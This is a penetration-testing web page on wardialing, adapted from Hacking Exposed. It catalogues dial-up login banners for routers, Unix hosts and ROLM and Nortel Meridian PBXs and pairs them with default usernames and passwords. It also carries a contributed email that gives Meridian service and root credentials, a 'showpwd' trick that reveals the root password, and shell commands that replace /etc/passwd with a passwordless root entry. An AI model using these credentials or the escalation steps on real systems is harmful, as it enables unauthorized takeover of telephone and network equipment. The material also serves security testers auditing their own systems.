LHF

Low Hanging Fruit Domain (LHF):
(Excerpts from Hacking Exposed written by Stephan Barnes  "M4phr1k")

Banner Contributions from the White Hat community are posted below. Keep em coming. The banners right below are from my experiences.

This dial-up domain tends to be the one that takes the least amount of time. And if lucky, provides instantaneous gratification.  It requires no scripting so essentially it is a guessing process.  It would be impossible to list all of the common id’s and passwords used for all the dial-in capable systems.  Here is one from http://cirt.net/passwords

Once again, experience from seeing a multitude of results from wardialing and playing with the resulting pool of potential systems will help immensely.  The ability to identify the signature or screen of a type of dial-up system helps provide the basis from where to start utilizing the default userid or passwords for that system.  Whichever list you use or consult; the key here is to spend no-more than the amount of time required to expend all of the possibilities for default id’s and passwords and then if unsuccessful move on to the next domain.

Stay tuned for a page devoted to Screen Prints of what the system login prompts look like:

Im constantly updating: If you have anything let me know

PC ANYWHERE

(should be called PC Everywhere)

30-Jun-XX 13:24:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


Please press <Enter>...

All you have to do here is have a copy of PC ANYWHERE and dial back the target and see what happens ;>

There are different modes so if it is encrypted it could be tougher etc...

CISCO

30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


User Access Verification
Password: 
Password: 
Password: 
% Bad passwords
+++

Typically CISCO so If you can luck out and get in with a password then you would be dropped into a prompt:

RouterA123XX>

Sometimes the person dialing into the router leaves the router in an active state because they did not log out graecfully

30-Jun-XX 13:25:55 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


RouterB345XX>

If this happens then do a SHOW CON or type ? and take it from there.

BAYNETWORKS

30-Jun-XX 13:26:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

Bay Networks, Inc. and its Licensors.
Copyright 1992,1993,1994,1995,1996,1997,1998. All rights reserved.

Login:

01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

Annex Command Line Interpreter * Copyright (C) 1988, 1998 Bay Networks
Checking authorization, Please wait...
Annex username:

01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM 
Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks
annex:

Consult your favorite default password list

SHIVA LAN ROVERS

30-Jun-XX 16:40:13 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS

@ Userid: 
@ Userid: 
@ Userid: 
@ Userid: 
@ Userid: 
@ Userid:

Consult your favorite default password list

IBM AIX

30-Jun-XX 17:20:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
login:

Try uid: oracle pwd:oracle or no password etc..

HP UNIX

30-Jun-XX 17:21:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


GenericSysName [HP Release B.10.20] (see /etc/issue)
login:


Consult your favorite default password list

UNIX - VARIOUS

02-Jul-XX 17:28:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS

Welcome to SCO UNIX System V/386 Release 3.2

XXXXXX!login:

02-Jul-XX 17:29:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS


SCO OpenServer(TM) Release 5 (strXXXX) (tty1A)

*****************************************
****<<Wed Apr XX XX:XX:XX EDT XXXX>>*****
************<< 3.2v5.0.4 >>*************
*****************************************
(Please Use Lower Case Letters!)
login:


02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM

The system's name is XXXXXXXX.
Welcome to USL UNIX System V Release 4.2 Version 1
login:

02-Jul-XX 17:39:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM 
Welcome to UnixWare 2.01
The system's name is XXXXXX.

login:

Consult your favorite default password list

ROLM

02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM


ROLM CBX MODEL 10, 9030A PROCESSOR (Prom Rev 3.4) SITE ID: XXXXXXXX
RELEASE: 9005.6.84 BIND DATE: 27/January/98 12 Megabytes
(C) Copyright 1980-1998 Siemens Rolm Communications Inc. All rights reserved.
ROLM is a registered trademark of Siemens Rolm Communications Inc. 
17:38:16 ON Saturday x/xx/xxxx 25 DEGREES C


USERNAME:

PASSWORD: 
Not in directory


This is PBX Management console action gang, a few of these uid/pwd combos work still

admin pwp

eng engineer

op op

op operartor

su super

Or you might see the fails it this way:

USERNAME:

PASSWORD:

INVALID USERNAME-PASSWORD PAIR.

 

ROLM SIEMENS PHONE MAIL

Login:

Password:

ROLM Phonemail Version 6.4

Login:
Password

ROLM Phonemail Version 6.4

(C) Copyright 1989-2000 Siemens I & C Networks, Inc. All Rights Reserved

!!!

ROLM Phonemail Site ID: xxxxxxxxxx

PhoneMail release 6.4.3

CPU Type of local node is GenuineIntel 80586 133mhz

?Phonemail is active with 16 Channels

Function:

Friday Feb 2, 2002 4:15 AM

sysadmin sysadmin is a good place to start on the uid pwd pair ;>

SECURE ID

Hello 
Password : 
58945664 :
Hello 
Password : 
16232368 :
Hello 
Password : 
77856559 :
Your access is denied, Good Bye.


(If you see this you might want to forget it, this is challenge response so it will be nearly impossible to hack RSA SecureID@ token)

 

BANNER (WAR DIAL and PBX) CONTRIBUTIONS SECTION

If you have any contributions feel free to send it along to 

stephandbarnes@gmail.com

If I post your banner or suggestion I certainly point to the credit. Check out the Hacking Meridian seciton and you can see. Newest data first.


 

From: Sacha Faust 4/11/02
sacha@severus.org

Thanks Sacha!

Stephan, From some results I found,

Welcome to USL UNIX System V Release 4.2 Version 1 == AUDIX or it's link with some AUDIX system. The "System's name is" part always seems to be set to "Intuity"

Here are some additionall banners I found :

1. OpenVMS VAX
Welcome to OpenVMS VAX V6.1
Username:


2. Direct Audix
System name: audix
login:

3. QNX
QNX Version 3.21 Node 0 $tty3 Local Time: XXX
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:

4. QNX (might vary depending on OS version or config)
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:

5. CITRIX metaframe (not 100% sure)
ICA

---------
Sacha Faust
sacha@severus.org


HACKING Meridian NEW Feb 2, 2002 for all you GroundHogs :> (this is in the Meridian Section also)

Sent in from a fellow Pen Tester. This stuff does work! because I've gotten in with it. There were a few techniques I was not privy to so this was GREAT info.

Posted with Permission from Mark A. Rowe at Pentest Limited

Thanks Mark!

----------------------- Email Excerpt -----------------------------

Hi Stephan,

I've just been on your website www.m4phr1k.com which is great. While browsing I noticed that you had started a section on Meridian and thought you might be interested in an email I posted to the pen-test list a while back. At the time HD Moore asked me whether I was going to write it up or put it on a website but I forgot all about it. Anyway if didn't already know it and think it is useful feel free to put it on your site when you have the time. I've never come across a system in the UK where the service account has had its password changed.

The email is below. I'll be looking at an Ericsson MD110 in the next couple of weeks, if I find anything useful I will let you know.

Regards,
Mark.

========================================================================
I came across this while doing a security review 3 years ago. I tried to contact Nortel several times but never received a response. I guess they don't think it is important :-o

If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file 
off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;) If you log into 
the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage 
the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999". I really wish I had more time to write up the stuff I find out there.

HD

Anyway I think the service account exists on the MAX,CCR and Link Meridian components.

Here are some other stuff I came across,

Accounts that give UNIX level access:

BOXAccountPasswordUse
MAX, CCR, LINKservicesmileGeneral Engineer Account
CCR, LINKdisttech4tasEngineer Account
MAXroot3ep5w2uRoot

Accounts that give application level access 

BOXAccountPasswordUse
MAXmaintntacdmaxMaintenance Account
CCR, LINKmaintmaintMaintenance Accout
CCRccrusrccrusrUser Account
LINKmlusrmlusrUser Account

To gain root access on Link or CCR:

Login as disttech/4tas

type "showpwd"

at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

When you are told this is invalid, enter the same thing again.

The root password is now displayed in plain text on the screen. You can now "su" to root with this password.

To gain access to the Meridian itself - there are two methods of access depending how the switch is set up. Try password only first as most will probably be set up like this -

Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintence)

Username and password
logi customer
PASS? 0000

logi admin1
PASS? 1111

logi to
PASS? 8429

Hope this helps,
Mark.

-- 
Mark Rowe
IT Security Consultant
PenTest Limited

www.pentest-limited.com

Comments